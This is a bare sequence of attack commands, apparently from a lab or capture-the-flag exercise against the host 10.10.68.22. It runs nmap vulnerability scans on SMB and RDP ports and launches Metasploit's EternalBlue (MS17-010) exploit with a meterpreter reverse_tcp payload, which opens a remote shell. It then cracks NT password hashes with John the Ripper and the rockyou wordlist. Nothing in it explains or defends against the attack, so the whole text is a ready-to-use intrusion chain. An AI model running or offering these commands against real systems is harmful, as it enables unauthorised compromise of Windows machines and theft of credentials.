nmap -p135,139,445,3389 --script=vuln 10.10.68.22
msfconsole
search eternalblue
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set RHOSTS 10.10.68.22
run
john --format=nt --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt